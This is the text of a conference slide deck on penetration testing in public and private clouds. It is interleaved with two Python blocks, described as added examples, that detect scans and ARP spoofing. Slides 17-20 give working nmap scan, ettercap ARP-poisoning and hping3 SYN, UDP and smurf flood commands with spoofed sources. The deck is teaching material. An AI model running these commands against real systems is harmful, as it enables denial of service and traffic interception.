1
Penetration Testing in the Cloud
Dan Lambright
LISA14
2
Agenda
● Explore penetration testing on..
● Public cloud
● Private cloud (owner)
● Private cloud (tenant)
3
Penetration Testing
● “Wargames”
● Mimic real attacks
● Test IDS/firewall detection
● Test security
● How
● Typically simulate attacks in a “safe” environment
● Or, attack actual machines
● Use special software, e.g. Nessus, metasploit, nmap..
4
Representative attacks
● Spoofing
● Man in the middle
● Denial of service
● Port scans
5
Challenges on Cloud
● CSP have good security
● But, guests are your responsibility to protect
● Virtual
● No HW security appliances
● No low level access (grub)
● IP addresses may be ephemeral
● Some pen tests could be expensive
● Penetration tests cannot affect others
6
Private Cloud Security
● Can't attack from cloud with spoofed source address
● Infrastructure resilient to DDOS (LOTS of bandwidth)
● Cannot sniff other tenant's traffic
● You could be attacked by any of..
● Spoofing, portscan, MITM, DOS
7
Screenshot of break-in attempts AWS
8
Policies For Penetration Tests
● Most CSP will grant permission for a window of time
● No DOS tests
● No tests on instances that share physical network
● on AWS cannot use m1.small or t1.micro
● Some CSP have slow responses to requests
9
Commercial Tools
● CloudInspect
● On-demand pen tests
● DDOS sinks – Prolexic
● AlertLogic
● 24/7 response
PRIVATE CLOUD ADMINISTRATOR
11
Per instance vulnerability tests
● Do not wish to affect other instances
● Want to observe an instance's traffic
● Run an IDS against a particular instance
12
Openstack plumbing
13
Bridges
Bonding? No, do not want to modify
Can tap the interface with snort (run multiple snorts on host?)
Could rate limit interfaces on bridges
Openstack allows rate limits or absolute limits on accounts
tc – traffic shaper
TENANT
15
Private Cloud Tenant
● Suppose wish to avoid network traffic
● How about attack from a container?
● IP address, MTU
● NAT for external connections
● “Ceiling” on container resources
● No “floor” / minimal guaranteed resources
● Skips external firewall !
16
Set up
● Kali – popular penetration testing distro
● Debian on red hat –
● 10.x.x.x subnet
● Import files (eg pcap)
[Diagram labels: kali container, docker bridge, instance, qbr..]
sudo docker run --privileged pandrew/kali /bin/bash
17
Port Scans
● nmap
● Network discovery tool
● Create “map” of network
Examples
nmap -sX (Xmas scan)
nmap -sN (Null scan)
nmap -sA (ACK scan)
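To check that an IDS actually sees these three scan types, the sketch below classifies TCP probes by their flag bits and reports sources that hit several ports. It is an added example, not code from the slides; the function names, the threshold and the sample packets are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def build_tcp_header(sport, dport, flags):
    """Constructed sample input: a 20-byte TCP header with no options."""
    return struct.pack("!HHIIHHHH", sport, dport, 0, 0, (5 << 12) | flags, 1024, 0, 0)


def parse_tcp_header(header):
    """Return (source port, destination port, the six classic flag bits)."""
    if len(header) < 20:
        raise ValueError("truncated TCP header")
    sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", header[:14])
    return sport, dport, off_flags & 0x3F


def classify_probe(flags, handshake_seen):
    """Map a flag combination to the scan type it matches, or None."""
    if flags == 0:
        return "null"                      # no flags set (nmap -sN)
    if flags == FIN | PSH | URG:
        return "xmas"                      # FIN+PSH+URG (nmap -sX)
    # A bare ACK is normal inside an established flow, so it only counts
    # as a probe when no SYN was ever seen for that flow (nmap -sA).
    if flags == ACK and not handshake_seen:
        return "ack"
    return None


def detect_scans(packets, threshold=3):
    """packets: iterable of (src_ip, dst_ip, tcp_header_bytes).

    Returns {src_ip: {scan_type: [ports]}} for every source that probed at
    least `threshold` distinct destination ports with one scan type.
    """
    handshakes = set()                     # flows for which a SYN was observed
    hits = defaultdict(lambda: defaultdict(set))
    for src, dst, header in packets:
        sport, dport, flags = parse_tcp_header(header)
        flow = (src, sport, dst, dport)
        if flags & SYN:
            handshakes.add(flow)
            handshakes.add((dst, dport, src, sport))
            continue
        kind = classify_probe(flags, flow in handshakes)
        if kind:
            hits[src][kind].add(dport)
    report = {}
    for src, kinds in hits.items():
        flagged = {k: sorted(p) for k, p in kinds.items() if len(p) >= threshold}
        if flagged:
            report[src] = flagged
    return report


# Constructed sample traffic (addresses and ports are made up for the example).
TARGET = "172.17.42.1"
SAMPLE_PACKETS = (
    [("172.17.0.5", TARGET, build_tcp_header(50000, p, FIN | PSH | URG)) for p in (22, 80, 443)]
    + [("172.17.0.6", TARGET, build_tcp_header(50001, p, 0)) for p in (22, 80, 443)]
    + [("172.17.0.7", TARGET, build_tcp_header(50002, p, ACK)) for p in (22, 80, 443)]
    + [
        # Ordinary client: full handshake, then a bare ACK that must not alert.
        ("172.17.0.8", TARGET, build_tcp_header(40000, 22, SYN)),
        (TARGET, "172.17.0.8", build_tcp_header(22, 40000, SYN | ACK)),
        ("172.17.0.8", TARGET, build_tcp_header(40000, 22, ACK)),
    ]
)

if __name__ == "__main__":
    for source, findings in detect_scans(SAMPLE_PACKETS).items():
        print(source, findings)
```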
18
Spoofing
● hping3
Examples
nmap -sX (Xmas scan)
nmap -sN (Null scan)
nmap -sA (ACK scan)
19
Man in the Middle
● Ettercap
● Two machines, each with IP address
● Poison ARP table
● Simulate victim and middleman
Examples
apt-get install ettercap-text-only
ettercap -T -M ARP -j /tmp/hosts.txt -F html.ef /172.17.0.26/ //
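On the detection side, a poisoned ARP table shows up as an IP address whose MAC changes, and as one MAC claiming several IPs. The sketch below is an added example, not code from the slides; the function names and the sample ARP messages (addresses and MACs) are constructed assumptions.

```python
import socket
import struct

ARP_FORMAT = "!HHBBH6s4s6s4s"   # htype, ptype, hlen, plen, oper, sha, spa, tha, tpa
ARP_REQUEST, ARP_REPLY = 1, 2


def _mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def build_arp(oper, sender_mac, sender_ip, target_mac, target_ip):
    """Constructed sample input: a 28-byte Ethernet/IPv4 ARP payload."""
    return struct.pack(
        ARP_FORMAT, 1, 0x0800, 6, 4, oper,
        _mac_bytes(sender_mac), socket.inet_aton(sender_ip),
        _mac_bytes(target_mac), socket.inet_aton(target_ip),
    )


def parse_arp(payload):
    """Return (operation, sender MAC, sender IP) from an ARP payload."""
    if len(payload) < 28:
        raise ValueError("truncated ARP payload")
    htype, ptype, hlen, plen, oper, sha, spa, _tha, _tpa = struct.unpack(
        ARP_FORMAT, payload[:28]
    )
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("not Ethernet/IPv4 ARP")
    return oper, sha.hex(":"), socket.inet_ntoa(spa)


def find_arp_conflicts(payloads):
    """Track sender IP-to-MAC bindings across ARP messages.

    Requests and replies are both used, because either can update a cache.
    Returns:
      moved       - [(ip, first_mac, new_mac)] when an IP is claimed by a new MAC
      multi_claim - {mac: [ips]} for MACs that claimed more than one IP
    Legitimate failover or proxy ARP also triggers these, so treat the output
    as something to review against an inventory rather than as a verdict.
    """
    first_binding = {}
    ips_by_mac = {}
    moved = []
    for payload in payloads:
        _oper, mac, ip = parse_arp(payload)
        known = first_binding.setdefault(ip, mac)
        if known != mac and (ip, known, mac) not in moved:
            moved.append((ip, known, mac))
        ips_by_mac.setdefault(mac, set()).add(ip)
    multi_claim = {m: sorted(ips) for m, ips in ips_by_mac.items() if len(ips) > 1}
    return {"moved": moved, "multi_claim": multi_claim}


# Constructed sample capture: three honest announcements, then two forged
# replies in which the middleman's MAC claims the gateway and victim IPs.
GATEWAY = ("02:42:ac:11:2a:01", "172.17.42.1")
VICTIM = ("02:42:ac:11:00:1a", "172.17.0.26")
MIDDLE = ("02:42:ac:11:00:17", "172.17.0.23")
SAMPLE_ARP = [
    build_arp(ARP_REPLY, *GATEWAY, *VICTIM),
    build_arp(ARP_REPLY, *VICTIM, *GATEWAY),
    build_arp(ARP_REQUEST, *MIDDLE, "00:00:00:00:00:00", GATEWAY[1]),
    build_arp(ARP_REPLY, MIDDLE[0], GATEWAY[1], *VICTIM),
    build_arp(ARP_REPLY, MIDDLE[0], VICTIM[1], *GATEWAY),
]

if __name__ == "__main__":
    print(find_arp_conflicts(SAMPLE_ARP))
```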
20
Denial of Service
● Hping3 from docker container
● Cannot stress system
SYN attack to port 22
hping3 -c 10000 -d 120 -S -w 64 -p 22 --flood --rand-source -i eth0 172.17.42.1
Large UDP packets
hping3 --rand-source --udp --flood -d 8192 172.17.42.1
Smurf
sudo sysctl -w net.ipv4.icmp_echo_ignore_broadcasts=0
hping3 -1 --flood -a 172.17.0.23 172.17.255.255
● Max bandwidth test...
● DDOS
21
Other
● Metasploit
● Curl command (ex. shellshocked)
● Lynx (html), but not limited to CLI..
22
Summary
● Cloud penetration testing is possible
● Coordinate with CSP
Thank You!
● dlambright@redhat.com
● henry_lambright@uml.edu
24
Still Need Penetration Tests
● Port scans are not (necessarily) blocked
